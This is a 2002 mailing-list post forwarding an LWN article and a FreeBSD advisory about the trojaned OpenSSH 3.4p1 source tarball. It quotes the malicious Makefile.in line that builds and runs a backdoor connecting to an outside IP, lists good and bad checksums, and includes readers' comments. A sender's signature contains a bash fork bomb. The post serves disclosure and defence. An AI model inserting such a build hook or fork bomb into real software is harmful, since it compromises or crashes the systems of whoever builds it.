[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Savannah-hackers] OpenSSH 3.4p1 trojaned
From: |
Mark H. Weaver |
Subject: |
[Savannah-hackers] OpenSSH 3.4p1 trojaned |
Date: |
Thu, 01 Aug 2002 14:55:41 -0400 |
http://lwn.net/Articles/6524/
[...]
Trojan horse in OpenSSH 3.4p1 source distribution
From: Mikael Olsson <address@hidden>
To: address@hidden
Subject: openssh-3.4p1.tar.gz distribution recently trojaned
Date: Thu, 01 Aug 2002 13:20:47 +0200
From
[27]http://docs.freebsd.org/cgi/getmsg.cgi?fetch=394609+0+current/freebsd-secur
ity
----- Forwarded message from Edwin Groothuis <address@hidden> -----
Date: Thu, 1 Aug 2002 16:55:51 +1000
From: Edwin Groothuis <address@hidden>
To: address@hidden
Subject: openssh-3.4p1.tar.gz trojaned
Greetings,
Just want to inform you that the OpenSSH package op ftp.openbsd.org
(and probably all its mirrors now) it trojaned:
[28]ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz
The OpenBSD people have been informed about it (via email to
address@hidden and via irc.openprojects.org/#openbsd)
The changed files are openssh-3.4p1/openbsd-compat/Makefile.in:
all: libopenbsd-compat.a
+ @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh
./bf-test.out &
bf-test.c[1] is nothing more than a wrapper which generates a
shell-script[2] which compiles itself and tries to connect to an
server running on 203.62.158.32:6667 (web.snsonline.net).
[1] [29]http://www.mavetju.org/~edwin/bf-test.c
[2] [30]http://www.mavetju.org/~edwin/bf-output.sh
This is the md5 checksum of the openssh-3.4p1.tar.gz in the FreeBSD
ports system:
MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8
This is the md5 checksum of the trojaned openssh-3.4p1.tar.gz:
MD5 (openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57
Edwin
--
Edwin Groothuis | Personal website: [31]http://www.MavEtJu.org
address@hidden | Weblog: [32]http://www.mavetju.org/weblog/weblog.php
bash$ :(){ :|:&};: | Interested in MUDs? [33]http://www.FatalDimensions.org/
__________________________________________
([34]Log in to post comments)
Trojan horse in OpenSSH 3.4p1 source distribution
(Posted Aug 01, 2002 15:07 UTC (Thu) by craighagan) ([35]Post reply)
This appears to be a FreeBSD ports thing. I build from
sources downloaded from the openssh website within 24 hours
of the release. I've double-checked said sources and
do *not* see either the Makefile.in modification
nor the bf-test.c source via find.
I recommend other folks check their sources so that
either the ports origin -- or a hack at openssh's distribution
point can be confirmed.
Trojan horse in OpenSSH 3.4p1 source distribution
(Posted Aug 01, 2002 15:08 UTC (Thu) by craighagan) ([36]Post reply)
silly me. i forgot that -ports ftp's the software upon build.
Trojan horse in OpenSSH 3.4p1 source distribution
(Posted Aug 01, 2002 16:22 UTC (Thu) by erat) ([37]Post reply)
I built 3.4p1 last night from a tarball downloaded from openssh.com.
No trojan found, and the checksum matched the "good" checksum from the
security alert.
Copyright (©) 2002, Eklektix, Inc.
Linux (®) is a registered trademark of Linus Torvalds
Web hosting provided by [38]Rackspace.com.
References
1. http://lwn.net/
2. http://php.lwn.net/corp/advertise/text/visit.php3?adid=382
3. http://php.lwn.net/mediakit/index.php3?s=t
4. http://lwn.net/login
5. http://lwn.net/newaccount
6. http://lwn.net/Articles/5712/
7. http://lwn.net/Articles/5052/
8. http://lwn.net/Articles/4553/
9. http://lwn.net/Articles/4151/
10. http://lwn.net/Articles/3668/
11. http://lwn.net/Articles/6524/?format=printable
12. http://lwn.net/
13. http://lwn.net/current/
14. http://lwn.net/Archives/
15. http://lwn.net/security
16. http://www.linuxcalendar.com/
17. http://old.lwn.net/Distributions/
18. http://old.lwn.net/Gallery/
19. http://lwn.net/KernelPatches/
20. http://old.lwn.net/stocks
21. http://old.lwn.net/
22. http://lwn.net/op/About.lwn/
23. http://php.lwn.net/corp/donate/
24. http://lwn.net/mediakit
25. http://lwn.net/headlines/
26. http://lwn.net/op/Privacy.lwn/
27.
http://docs.freebsd.org/cgi/getmsg.cgi?fetch=394609+0+current/freebsd-security
28. ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz
29. http://www.mavetju.org/~edwin/bf-test.c
30. http://www.mavetju.org/~edwin/bf-output.sh
31. http://www.MavEtJu.org/
32. http://www.mavetju.org/weblog/weblog.php
33. http://www.FatalDimensions.org/
34. http://lwn.net/login
35. http://lwn.net/Articles/6547/comment
36. http://lwn.net/Articles/6550/comment
37. http://lwn.net/Articles/6560/comment
38. http://www.rackspace.com/
- [Savannah-hackers] OpenSSH 3.4p1 trojaned,
Mark H. Weaver <=